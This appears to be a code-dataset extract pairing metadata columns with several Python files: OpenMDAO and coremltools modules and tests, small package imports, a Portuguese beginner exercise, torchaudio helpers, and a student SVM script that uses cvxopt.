| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7effc8cade5f4d8d9108720119eb2a1287dd53b3
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/pexpect/replwrap.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/pexpect/replwrap.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/pexpect/replwrap.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/45/aa/bd/5e061f22517eac7fc200b8056f32b51ff038a3436a98af6ae396a79950
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.427083
| 0
| 96
| 1
| 96
| 96
| 0.46875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7d4971a2bb40461f7beda43a62b757539c7f1e60
| 766
|
py
|
Python
|
openmdao.main/src/openmdao/main/datatypes/api.py
|
swryan/OpenMDAO-Framework
|
f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec
|
[
"Apache-2.0"
] | null | null | null |
openmdao.main/src/openmdao/main/datatypes/api.py
|
swryan/OpenMDAO-Framework
|
f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec
|
[
"Apache-2.0"
] | null | null | null |
openmdao.main/src/openmdao/main/datatypes/api.py
|
swryan/OpenMDAO-Framework
|
f50d60e1a8cadac7fe03d26ffad5fb660b2a15ec
|
[
"Apache-2.0"
] | null | null | null |
from openmdao.main.datatypes.array import Array
from openmdao.main.datatypes.any import Any
from openmdao.main.datatypes.bool import Bool
from openmdao.main.datatypes.complex import Complex
from openmdao.main.datatypes.dict import Dict
from openmdao.main.datatypes.enum import Enum
from openmdao.main.datatypes.event import Event
from openmdao.main.datatypes.float import Float
from openmdao.main.datatypes.file import File
from openmdao.main.datatypes.int import Int
from openmdao.main.datatypes.list import List
from openmdao.main.datatypes.slot import Slot
from openmdao.main.datatypes.str import Str
# Traits from Enthought - don't import these directly because we may
# change what they point to later
from enthought.traits.api import Python, on_trait_change
| 40.315789
| 68
| 0.83812
| 117
| 766
| 5.470085
| 0.316239
| 0.24375
| 0.325
| 0.507813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101828
| 766
| 18
| 69
| 42.555556
| 0.930233
| 0.127937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
add77b35b275fd8190cd1462cb860fd1b9bcb9a6
| 9,396
|
py
|
Python
|
coremltools/converters/mil/mil/passes/test_fp16_compute_precision.py
|
tonybove-apple/coremltools
|
22a8877beec7bad136ba5612d5aacd8e323ecdfc
|
[
"BSD-3-Clause"
] | 2,740
|
2017-10-03T23:19:01.000Z
|
2022-03-30T15:16:39.000Z
|
coremltools/converters/mil/mil/passes/test_fp16_compute_precision.py
|
tonybove-apple/coremltools
|
22a8877beec7bad136ba5612d5aacd8e323ecdfc
|
[
"BSD-3-Clause"
] | 1,057
|
2017-10-05T22:47:01.000Z
|
2022-03-31T23:51:15.000Z
|
coremltools/converters/mil/mil/passes/test_fp16_compute_precision.py
|
tonybove-apple/coremltools
|
22a8877beec7bad136ba5612d5aacd8e323ecdfc
|
[
"BSD-3-Clause"
] | 510
|
2017-10-04T19:22:28.000Z
|
2022-03-31T12:16:52.000Z
|
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
from coremltools._deps import _IS_MACOS
from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil.passes import quantization_passes as transform
from coremltools.converters.mil.testing_utils import (
assert_model_is_valid,
get_op_types_in_program,
apply_pass_and_basic_check,
)
import unittest
import numpy as np
import coremltools as ct
np.random.seed(1984)
class FP16CastTransform(unittest.TestCase):
""""""
"""
Input graph:
input -----> square -----> out
Output graph:
input -----> cast(dtype="fp16") -----> square -----> cast(dtype="fp32") ---> out
"""
def test_single_input_to_single_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
x = mb.square(x=x)
return x
self.assertEqual(get_op_types_in_program(prog), ['square'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "square", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 1)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "square")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp32")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20)},
expected_output_shapes={block.outputs[0].name: (10, 20)},
)
"""
Input graph:
input -----> div -----> out
^
const(eps) ---|
Output graph:
input --------> cast(dtype="fp16") -----> div -----> cast(dtype="fp32") ---> out
^
const(eps) ---> cast(dtype="fp16") --------|
"""
def test_divide_by_zero_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
eps = mb.const(val=1e-10)
x = mb.real_div(x=x, y=eps)
return x
prev_prog, prev_block, block = apply_pass_and_basic_check(
prog, transform.FP16ComputePrecision(op_selector=lambda op: True)
)
mlmodel = ct.convert(prog, source="milinternal")
input_dict = {"x": np.random.rand(10, 20)}
if _IS_MACOS:
prediction = mlmodel.predict(input_dict, useCPUOnly=True)
assert(not np.isnan(prediction['real_div_0']).any())
assert(np.isfinite(prediction['real_div_0']).all())
"""
Input graph:
input1 ----->|
concat -----> out
input2 ----->|
Output graph:
input1 -----> cast(dtype="fp16") ----->|
concat -----> cast(dtype="fp32") ---> out
input2 -----> cast(dtype="fp16") ----->|
"""
def test_multiple_inputs_to_single_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20)), mb.TensorSpec(shape=(10, 20))])
def prog(x, y):
x = mb.concat(values= (x,y), axis=0)
return x
self.assertEqual(get_op_types_in_program(prog), ['concat'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "cast", "concat", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 1)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "concat")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp16")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 1)
self.assertEqual(cast_2.outputs[0].child_ops[0].op_type, "concat")
# Asserting third cast configuration
cast_3 = block.find_ops(op_type="cast")[2]
self.assertEqual(cast_3.dtype.val, "fp32")
self.assertEqual(len(cast_3.outputs), 1)
self.assertEqual(len(cast_3.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20), "y": (10, 20)},
expected_output_shapes={block.outputs[0].name: (20, 20)},
)
"""
Input graph:
|-----> output_1
input -----> split
|-----> output_2
Output graph:
|-----> cast(dtype="fp32") ---> output_1
input -----> cast(dtype="fp16") -----> split
|-----> cast(dtype="fp32") ---> output_2
"""
def test_multiple_outputs_from_single_operation(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
x = mb.split(x=x, axis=0, num_splits=2)
return x
self.assertEqual(get_op_types_in_program(prog), ['split'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "split", "cast", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 1)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "split")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp32")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 0)
# Asserting third cast configuration
cast_3 = block.find_ops(op_type="cast")[2]
self.assertEqual(cast_3.dtype.val, "fp32")
self.assertEqual(len(cast_3.outputs), 1)
self.assertEqual(len(cast_3.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20)},
expected_output_shapes={block.outputs[0].name: (5, 20), block.outputs[1].name: (5, 20)},
)
"""
Input graph:
|----> square ---> output_1
input|
|----> relu ---> output_2
Output graph:
|---->square-----> cast(dtype="fp32") ---> output_1
input -----> cast(dtype="fp16")
|----> relu -----> cast(dtype="fp32") ---> output_2
"""
def test_single_input_to_multiple_operations(self):
@mb.program(input_specs=[mb.TensorSpec(shape=(10, 20))])
def prog(x):
y = mb.square(x=x)
z = mb.relu(x=x)
return y,z
self.assertEqual(get_op_types_in_program(prog), ['square', 'relu'])
apply_pass_and_basic_check(prog, transform.FP16ComputePrecision(op_selector=lambda op: True))
_, _, block = apply_pass_and_basic_check(prog, "common::dead_code_elimination")
self.assertEqual(get_op_types_in_program(prog), ["cast", "square", "cast", "relu", "cast"])
# Asserting first cast configuration
cast_1 = block.find_ops(op_type="cast")[0]
self.assertEqual(cast_1.dtype.val, "fp16")
self.assertEqual(len(cast_1.outputs), 1)
self.assertEqual(len(cast_1.outputs[0].child_ops), 2)
self.assertEqual(cast_1.outputs[0].child_ops[0].op_type, "square")
self.assertEqual(cast_1.outputs[0].child_ops[1].op_type, "relu")
# Asserting second cast configuration
cast_2 = block.find_ops(op_type="cast")[1]
self.assertEqual(cast_2.dtype.val, "fp32")
self.assertEqual(len(cast_2.outputs), 1)
self.assertEqual(len(cast_2.outputs[0].child_ops), 0)
# Asserting third cast configuration
cast_3 = block.find_ops(op_type="cast")[2]
self.assertEqual(cast_3.dtype.val, "fp32")
self.assertEqual(len(cast_3.outputs), 1)
self.assertEqual(len(cast_3.outputs[0].child_ops), 0)
assert_model_is_valid(
prog,
{"x": (10, 20)},
expected_output_shapes={block.outputs[0].name: (10, 20), block.outputs[1].name: (10, 20)},
)
| 36.703125
| 102
| 0.58759
| 1,181
| 9,396
| 4.447079
| 0.133785
| 0.134235
| 0.0754
| 0.092155
| 0.775514
| 0.735529
| 0.724486
| 0.71211
| 0.701447
| 0.657083
| 0
| 0.039498
| 0.261707
| 9,396
| 255
| 103
| 36.847059
| 0.717601
| 0.063538
| 0
| 0.548148
| 0
| 0
| 0.052167
| 0.016267
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.074074
| false
| 0.081481
| 0.051852
| 0
| 0.17037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
addd109cfd3d9c052a9e6651f12f83d818ec699d
| 165
|
py
|
Python
|
sales_register/adapters/repositories/postgres/__init__.py
|
tamercuba/purchase-system
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | null | null | null |
sales_register/adapters/repositories/postgres/__init__.py
|
tamercuba/purchase-system
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | 6
|
2021-05-15T21:44:19.000Z
|
2021-05-23T22:20:13.000Z
|
sales_register/adapters/repositories/postgres/__init__.py
|
tamercuba/sales-register
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | null | null | null |
from adapters.repositories.postgres.sale_repository import SaleRepository
from adapters.repositories.postgres.salesman_repository import (
SalesmanRepository,
)
| 33
| 73
| 0.860606
| 16
| 165
| 8.75
| 0.625
| 0.171429
| 0.342857
| 0.457143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084848
| 165
| 4
| 74
| 41.25
| 0.927152
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
70e03b8e077b4af97d5b3b2a8055bc037be043a0
| 49
|
py
|
Python
|
ner/dtime/__init__.py
|
aaashuai/easy_wechat_reminder
|
2d8c032b2fcebf18a54d4aa7cb58db31fd333c35
|
[
"Apache-2.0"
] | 1
|
2021-11-06T14:06:03.000Z
|
2021-11-06T14:06:03.000Z
|
ner/dtime/__init__.py
|
aaashuai/easy_wechat_reminder
|
2d8c032b2fcebf18a54d4aa7cb58db31fd333c35
|
[
"Apache-2.0"
] | 15
|
2021-06-20T08:35:25.000Z
|
2021-12-31T06:54:20.000Z
|
ner/dtime/__init__.py
|
aaashuai/easy_wechat_reminder
|
2d8c032b2fcebf18a54d4aa7cb58db31fd333c35
|
[
"Apache-2.0"
] | null | null | null |
from ner.dtime.dtime import ZHDatetimeExtractor
| 16.333333
| 47
| 0.857143
| 6
| 49
| 7
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 49
| 2
| 48
| 24.5
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cb44d2d99791f9c71c50438eeecfd99c8588ac4f
| 557
|
py
|
Python
|
Desafios/des031.py
|
joseangelooliveira-br/Python3
|
c0ba39768706f84f26b0616b75dd8c7971145b0e
|
[
"MIT"
] | null | null | null |
Desafios/des031.py
|
joseangelooliveira-br/Python3
|
c0ba39768706f84f26b0616b75dd8c7971145b0e
|
[
"MIT"
] | null | null | null |
Desafios/des031.py
|
joseangelooliveira-br/Python3
|
c0ba39768706f84f26b0616b75dd8c7971145b0e
|
[
"MIT"
] | null | null | null |
'''
km = int(input('Digite a distancia de sua viagem em quilometros: '))
if km <= 200:
print('Voce pagara R$ {} por sua passagem.'.format(km*.50))
else:
print('Voce pagara R$ {} por sua passagem.'.format(km * .45))
print('Você esta proximo de iniciar um viajem de {} km.'.format(km))
'''
km = int(input('Digite a distancia de sua viagem em quilometros: '))
print('Você esta proximo de iniciar um viajem de {} km.'.format(km))
if km <= 200:
preco = km * .50
else:
preco = km * .45
print('Voce pagara R$ {} por sua passagem.'.format(preco))
| 30.944444
| 68
| 0.644524
| 89
| 557
| 4.033708
| 0.337079
| 0.089136
| 0.125348
| 0.133705
| 0.86351
| 0.86351
| 0.86351
| 0.86351
| 0.763231
| 0.551532
| 0
| 0.030973
| 0.18851
| 557
| 17
| 69
| 32.764706
| 0.763274
| 0.517056
| 0
| 0
| 0
| 0
| 0.505747
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.142857
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
cb544aeef2a1ab4ccb43f250c0f8c53b3d739f0b
| 57
|
py
|
Python
|
config/watdafudge_c/client/__init__.py
|
happyfaults/pywatdafudge
|
cbbc05bf75f3d9fce115d6e117aedb0dbaa68a76
|
[
"MIT"
] | null | null | null |
config/watdafudge_c/client/__init__.py
|
happyfaults/pywatdafudge
|
cbbc05bf75f3d9fce115d6e117aedb0dbaa68a76
|
[
"MIT"
] | null | null | null |
config/watdafudge_c/client/__init__.py
|
happyfaults/pywatdafudge
|
cbbc05bf75f3d9fce115d6e117aedb0dbaa68a76
|
[
"MIT"
] | null | null | null |
from .. import Config
class Interactor(Config):
pass
| 14.25
| 25
| 0.719298
| 7
| 57
| 5.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192982
| 57
| 4
| 26
| 14.25
| 0.891304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
cb709c36e42f6be57e8bc365e7235f11b7458a4d
| 63
|
py
|
Python
|
rpi_monitor/__init__.py
|
WildflowerSchools/wf-rpi-monitor
|
e73e9979aec75f48ede2ca237f6e2a5568175384
|
[
"MIT"
] | 1
|
2022-02-03T17:28:23.000Z
|
2022-02-03T17:28:23.000Z
|
rpi_monitor/__init__.py
|
WildflowerSchools/wf-rpi-monitor
|
e73e9979aec75f48ede2ca237f6e2a5568175384
|
[
"MIT"
] | null | null | null |
rpi_monitor/__init__.py
|
WildflowerSchools/wf-rpi-monitor
|
e73e9979aec75f48ede2ca237f6e2a5568175384
|
[
"MIT"
] | null | null | null |
from rpi_monitor.core import *
from rpi_monitor.tests import *
| 21
| 31
| 0.809524
| 10
| 63
| 4.9
| 0.6
| 0.285714
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126984
| 63
| 2
| 32
| 31.5
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
38023b54af566671041e7087cc93af11c5a9d952
| 372
|
py
|
Python
|
torchaudio_augmentations/utils.py
|
wesbz/torchaudio-augmentations
|
e7b379be60376bb4a44f72a6840358871b3ff06d
|
[
"MIT"
] | 112
|
2021-05-23T20:35:53.000Z
|
2022-03-29T09:04:54.000Z
|
torchaudio_augmentations/utils.py
|
wesbz/torchaudio-augmentations
|
e7b379be60376bb4a44f72a6840358871b3ff06d
|
[
"MIT"
] | 6
|
2021-06-29T18:36:02.000Z
|
2021-11-15T17:55:44.000Z
|
torchaudio_augmentations/utils.py
|
wesbz/torchaudio-augmentations
|
e7b379be60376bb4a44f72a6840358871b3ff06d
|
[
"MIT"
] | 14
|
2021-06-03T06:32:27.000Z
|
2022-02-17T02:31:16.000Z
|
import torch
def tensor_has_valid_audio_batch_dimension(tensor: torch.Tensor) -> torch.Tensor:
if tensor.ndim == 3:
return True
return False
def add_audio_batch_dimension(tensor: torch.Tensor) -> torch.Tensor:
return tensor.unsqueeze(dim=0)
def remove_audio_batch_dimension(tensor: torch.Tensor) -> torch.Tensor:
return tensor.squeeze(dim=0)
| 23.25
| 81
| 0.744624
| 52
| 372
| 5.115385
| 0.403846
| 0.24812
| 0.383459
| 0.281955
| 0.620301
| 0.620301
| 0.620301
| 0.620301
| 0.443609
| 0.443609
| 0
| 0.009585
| 0.158602
| 372
| 15
| 82
| 24.8
| 0.840256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.111111
| 0.222222
| 0.888889
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
382eab0b90c3928b875bfb3f47a9efe08986b240
| 20,976
|
py
|
Python
|
CVX.py
|
saransh738/ELL409-SVM-CLASSIFIER-FROM-SCRATCH
|
16dc8c2f57f23cdea712fbce127d7b18f779754a
|
[
"Apache-2.0"
] | null | null | null |
CVX.py
|
saransh738/ELL409-SVM-CLASSIFIER-FROM-SCRATCH
|
16dc8c2f57f23cdea712fbce127d7b18f779754a
|
[
"Apache-2.0"
] | null | null | null |
CVX.py
|
saransh738/ELL409-SVM-CLASSIFIER-FROM-SCRATCH
|
16dc8c2f57f23cdea712fbce127d7b18f779754a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from libsvm.svmutil import *
from sklearn import svm
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
import cvxopt
from timeit import default_timer as timer
#Reading files
data_points = pd.read_csv('2019MT60763.csv', header = None, nrows = 3000)
data = np.array((data_points.sort_values(data_points.columns[25])).values)
dp = np.array(data)
class_label = dp[:,25]
# counting no of occurence of labels of each class
unique, counts = np.unique(class_label, return_counts=True)
dict(zip(unique, counts))
#print(counts)
# for 25 features
# FOR CLASSES {0,1}
text_x = dp[:631,:25]
text_t = dp[:631,25].astype('int')
for i in range(text_t.shape[0]):
if (text_t[i] == 0) :
text_t[i] = 1
else :
text_t[i] = -1
#testing data
tp_x_1 = np.append(dp[:100,:25],dp[306:406,:25],axis=0)
tp_t_1 = np.append(dp[:100,25],dp[306:406,25],axis=0)
tp_t_1 = tp_t_1.astype('int')
for i in range(tp_t_1.shape[0]):
if (tp_t_1[i] == 0) :
tp_t_1[i] = 1
else :
tp_t_1[i] = -1
tp_x_2 = np.append(dp[101:201,:25],dp[407:507,:25],axis=0)
tp_t_2 = np.append(dp[101:201,25],dp[407:507,25],axis=0)
tp_t_2 = tp_t_2.astype('int')
for i in range(tp_t_2.shape[0]):
if (tp_t_2[i] == 0) :
tp_t_2[i] = 1
else :
tp_t_2[i] = -1
tp_x_3 = np.append(dp[202:305,:25],dp[508:631,:25],axis=0)
tp_t_3 = np.append(dp[202:305,25],dp[508:631,25],axis=0)
tp_t_3 = tp_t_3.astype('int')
for i in range(tp_t_3.shape[0]):
if (tp_t_3[i] == 0) :
tp_t_3[i] = 1
else :
tp_t_3[i] = -1
#function to compute kernel function
def compute_K(kernel,X,gamma,degree):
K = X.dot(np.transpose(X))
if(kernel == 'poly'):
K = (gamma*K+1)**degree
elif(kernel == 'rbf'):
u = np.diag(X.dot(np.transpose(X))).reshape((-1, 1))*np.ones((1, X.shape[0]))
K = 2*K-u- np.diag(X.dot(np.transpose(X))).reshape((1, -1))*np.ones((X.shape[0], 1))
K = np.exp(gamma*K)
elif(kernel == 'sigmoid'):
K = np.tanh(gamma*K+1)
return K
def cvx_fiting(C,X,y,K):
n = X.shape[0]
y = y.reshape((-1,1)) * 1.0
H = ((y.dot(np.transpose(y)))*K)
Q = cvxopt.matrix(-np.ones((n,1)))
p = cvxopt.matrix(H)
G = cvxopt.matrix(np.concatenate((-np.eye(n), np.eye(n))))
h = cvxopt.matrix(np.append(np.zeros((n,1)),(np.ones((n,1)))*C))
A = cvxopt.matrix(np.transpose(y))
b = cvxopt.matrix(0.0)
cvxopt.solvers.options['show_progress'] = False
sol=cvxopt.solvers.qp(p,Q,G,h,A,b)
multipliers = np.array(sol['x'])
return multipliers
def get_scores(X,y,w,b):
p = np.dot(X,w.T)+b
m = y.shape[0]
score = 0
for j in range(m):
if (p[j] >= 0):
p[j] = 1
else :
p[j] = -1
for i in range(m):
if (p[i]*y[i]) > 0 :
score=score+1
return score/m
def weights(alpha,X,y):
m,n = X.shape
w = np.zeros(n)
for i in range(X.shape[0]):
w += alpha[i]*y[i]*X[i,:]
return w
support_vectors = np.where(cvx_fiting(1.0,text_x,(text_t),compute_K('linear',text_x,0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.29,text_x,(text_t),compute_K('rbf',text_x,1.0,0)) > 1e-4)[0]
print(support_vectors)
support_vectors = np.where(cvx_fiting(1.0,text_x,(text_t),compute_K('poly',text_x,1.0,1)) > 1e-4)[0]
print(support_vectors)
start = timer()
w = weights((cvx_fiting(1.0,text_x,text_t,compute_K('linear',text_x,0,0))),text_x,text_t)
b = text_t[((cvx_fiting(1.0,text_x,text_t,compute_K('linear',text_x,0,0))) > 1e-4).reshape(-1)] - np.dot(text_x[((cvx_fiting(1.0,text_x,text_t,compute_K('linear',text_x,0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x,text_t,w,b[0]))
w1 = weights((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))),tp_x_1,tp_t_1)
b1 = tp_t_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_1[((cvx_fiting(1.0,tp_x_1,tp_t_1,compute_K('linear',tp_x_1,0,0))) > 1e-4).reshape(-1)], w1)
p1 = get_scores(tp_x_2,tp_t_2,w1,b1[0])
p1+=get_scores(tp_x_3,tp_t_3,w1,b1[0])
w2 = weights((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))),tp_x_3,tp_t_3)
b2 = tp_t_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_3[((cvx_fiting(1.0,tp_x_3,tp_t_3,compute_K('linear',tp_x_3,0,0))) > 1e-4).reshape(-1)], w2)
p1+=get_scores(tp_x_2,tp_t_2,w2,b2[0])
p1+= get_scores(tp_x_1,tp_t_1,w2,b2[0])
w3 = weights((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))),tp_x_2,tp_t_2)
b3 = tp_t_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)] - np.dot(tp_x_2[((cvx_fiting(1.0,tp_x_2,tp_t_2,compute_K('linear',tp_x_2,0,0))) > 1e-4).reshape(-1)], w3)
p1+= get_scores(tp_x_1,tp_t_1,w,b[0])
p1+= get_scores(tp_x_3,tp_t_3,w,b[0])
print('Cross_validation score',p1/6)
end = timer()
print('Time',end - start)
w = weights((cvx_fiting(1.29,text_x,text_t,compute_K('rbf',text_x,1.0,0))),text_x,text_t)
b = text_t[((cvx_fiting(1.29,text_x,text_t,compute_K('rbf',text_x,1.0,0))) > 1e-4).reshape(-1)] - np.dot(text_x[((cvx_fiting(1.29,text_x,text_t,compute_K('rbf',text_x,1.0,0))) > 1e-4).reshape(-1)], w)
print('Training score',get_scores(text_x,text_t,w,b[0]))
